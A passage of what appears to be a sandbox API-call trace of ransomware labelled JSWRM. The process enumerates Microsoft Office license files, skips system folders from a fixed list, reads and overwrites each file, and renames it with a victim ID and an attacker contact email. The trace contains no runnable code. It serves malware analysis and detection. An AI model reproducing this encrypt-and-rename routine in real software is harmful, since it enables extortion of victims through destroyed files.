CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_OEM_Perp-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0102.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0102.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_OEM_Perp-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x2411c8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0102.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0102.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_OEM_Perp-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0102.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0102.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_OEM_Perp-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x2413a8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0102.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0102.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0102.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0102.487] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_oem_perp-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.488] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20780) returned 1 [0102.488] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5120) returned 0x24c1d0 [0102.488] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5120, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5120, lpOverlapped=0x0) returned 1 [0102.491] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.491] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5120, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5120, lpOverlapped=0x0) returned 1 [0102.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.491] CloseHandle (hObject=0x45c) returned 1 [0102.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0102.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0102.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0102.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0102.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0102.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0102.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.492] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_oem_perp-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_OEM_Perp-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_oem_perp-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0102.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0102.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0102.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0102.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0102.493] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe2d16476, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe2d16476, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe2f06362, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d43, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AccessR_OEM_Perp-ul-oob.xrm-ms", cAlternateFileName="AC1492~1.XRM")) returned 1 [0102.493] lstrcmpiW (lpString1="AccessR_OEM_Perp-ul-oob.xrm-ms", lpString2=".") returned 1 [0102.493] lstrcmpiW (lpString1="AccessR_OEM_Perp-ul-oob.xrm-ms", lpString2="..") returned 1 [0102.493] lstrcmpiW (lpString1="AccessR_OEM_Perp-ul-oob.xrm-ms", lpString2="...") returned 1 [0102.493] lstrcmpiW (lpString1="AccessR_OEM_Perp-ul-oob.xrm-ms", lpString2="windows") returned -1 [0102.493] lstrcmpiW (lpString1="AccessR_OEM_Perp-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0102.493] lstrcmpiW (lpString1="AccessR_OEM_Perp-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0102.493] lstrcmpiW (lpString1="AccessR_OEM_Perp-ul-oob.xrm-ms", lpString2="documents and settings") returned -1 [0102.493] lstrcmpiW (lpString1="AccessR_OEM_Perp-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.493] lstrcmpiW (lpString1="AccessR_OEM_Perp-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0102.493] lstrcmpiW (lpString1="AccessR_OEM_Perp-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0102.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0102.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0102.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241308, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0102.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0102.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0102.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0102.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241060, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0102.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0102.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0102.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0102.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0102.494] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_oem_perp-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.494] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11587) returned 1 [0102.494] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0102.494] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0102.497] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.497] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0102.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.497] CloseHandle (hObject=0x45c) returned 1 [0102.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0102.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0102.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0102.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0102.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0102.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0102.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.498] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_oem_perp-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_OEM_Perp-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_oem_perp-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0102.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0102.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0102.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0102.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0102.498] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe2d16476, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe2d16476, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe2f9ecf2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ddc, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AccessR_OEM_Perp-ul-phn.xrm-ms", cAlternateFileName="ACAD72~1.XRM")) returned 1 [0102.498] lstrcmpiW (lpString1="AccessR_OEM_Perp-ul-phn.xrm-ms", lpString2=".") returned 1 [0102.498] lstrcmpiW (lpString1="AccessR_OEM_Perp-ul-phn.xrm-ms", lpString2="..") returned 1 [0102.499] lstrcmpiW (lpString1="AccessR_OEM_Perp-ul-phn.xrm-ms", lpString2="...") returned 1 [0102.499] lstrcmpiW (lpString1="AccessR_OEM_Perp-ul-phn.xrm-ms", lpString2="windows") returned -1 [0102.499] lstrcmpiW (lpString1="AccessR_OEM_Perp-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0102.499] lstrcmpiW (lpString1="AccessR_OEM_Perp-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0102.499] lstrcmpiW (lpString1="AccessR_OEM_Perp-ul-phn.xrm-ms", lpString2="documents and settings") returned -1 [0102.499] lstrcmpiW (lpString1="AccessR_OEM_Perp-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.499] lstrcmpiW (lpString1="AccessR_OEM_Perp-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0102.499] lstrcmpiW (lpString1="AccessR_OEM_Perp-ul-phn.xrm-ms", lpString2="msocache") returned -1 [0102.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0102.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0102.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0102.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241010, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0102.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0102.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0102.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0102.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241100, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0102.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0102.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0102.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0102.499] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_oem_perp-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.500] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19932) returned 1 [0102.500] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dd0) returned 0x24c1d0 [0102.500] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dd0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dd0, lpOverlapped=0x0) returned 1 [0102.504] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.504] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4dd0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dd0, lpOverlapped=0x0) returned 1 [0102.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.504] CloseHandle (hObject=0x45c) returned 1 [0102.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0102.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0102.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0102.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0102.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0102.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0102.504] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.504] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_oem_perp-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_OEM_Perp-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_oem_perp-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0102.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0102.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0102.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0102.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0102.514] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe2b4c7d1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe2b4c7d1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe2d88bc4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2987, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AccessR_Retail-pl.xrm-ms", cAlternateFileName="AC7E42~1.XRM")) returned 1 [0102.514] lstrcmpiW (lpString1="AccessR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0102.514] lstrcmpiW (lpString1="AccessR_Retail-pl.xrm-ms", lpString2="..") returned 1 [0102.514] lstrcmpiW 